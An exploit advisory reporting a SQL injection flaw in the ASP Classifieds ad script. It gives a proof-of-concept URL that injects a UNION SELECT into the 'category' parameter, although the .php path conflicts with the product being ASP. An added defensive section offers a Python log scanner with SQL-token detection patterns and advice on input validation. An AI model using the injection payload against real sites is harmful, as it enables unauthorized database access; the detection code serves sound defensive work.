ASP Classifieds suffers from a remote SQL injection vulnerability.
e189fcd5c11ee4c290d2e24ce9052d1a142ab65d38292858958e6fe3fdecdaee
# Exploit Title: ASP Classifieds SQL Injection
# Date: 17/03/2012
# Author: r45c4l
# Email: infosecpirate@gmail.com
# Script url: http://preproject.com/pclasp/home/default.asp
# Version: N/A
# CVE : ()
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Product Description :
ASP Classifieds is one of the most customizable classified ad programs
that exist for ASP and Access. Unlimited images, unlimited categories
and much more make it perfect for everyone from those who want to set up
a used stamps classifieds site to those wanting to show and sell real estate.
Product Cost : 58$
=======================Exploit====================================
---ICW---
[ EXPL0!T ]
SQL Injection
p0c -
http://SERVER/classi/search.php?category=[SQli]
PoC -
http://SERVER/classi/search.php?category=-1+union+all+select+version()--
[Note: Tested on demo website]
d0rk - use your brain ;)
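
A defender-side check for the request shape shown in the PoC, as an added example that is not part of the original advisory: it scans web access logs for `category` values sent to `search.php` that are not plain integers, after URL decoding. The log lines are constructed samples, and the premise that `category` is normally a numeric id is an assumption, not something the advisory states.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Mar/2012:10:00:01 +0000] "GET /classi/search.php?category=12 HTTP/1.1" 200 5120
203.0.113.9 - - [17/Mar/2012:10:00:07 +0000] "GET /classi/search.php?category=-1+union+all+select+version()-- HTTP/1.1" 200 812
203.0.113.9 - - [17/Mar/2012:10:00:09 +0000] "GET /classi/search.php?category=-1%20union%20all%20select%20version()-- HTTP/1.1" 200 812
198.51.100.2 - - [17/Mar/2012:10:01:30 +0000] "GET /classi/search.php?category=cars&page=2 HTTP/1.1" 200 4876
198.51.100.7 - - [17/Mar/2012:10:02:00 +0000] "GET /classi/index.php?category=abc HTTP/1.1" 200 900
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL syntax that has no place in a category id (applied to the decoded value).
SQL_TOKENS = re.compile(r"\bunion\b.*\bselect\b|--|/\*|;|'", re.I | re.S)


def scan(log_text, path_suffix="/search.php", param="category"):
    """Return (line_no, client, severity, decoded_value) for suspicious requests."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(path_suffix):
            continue  # only the script named in the advisory is inspected
        # parse_qs decodes both '+' and %xx, so encoded variants compare equal.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if re.fullmatch(r"\d+", value):
                continue  # assumed normal shape: a plain numeric category id
            severity = "sqli-pattern" if SQL_TOKENS.search(value) else "non-integer"
            findings.append((lineno, client, severity, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule belongs in the application itself: reject any `category` that is not a number before it reaches the query, and bind it as a parameter rather than concatenating it.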
===========================================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0,
Hoody, sam
All members of ICW, AH and darkc0de, and all Indian Hackers
Special Greetz to : b4ltazar and s1nner_01
=== End () ====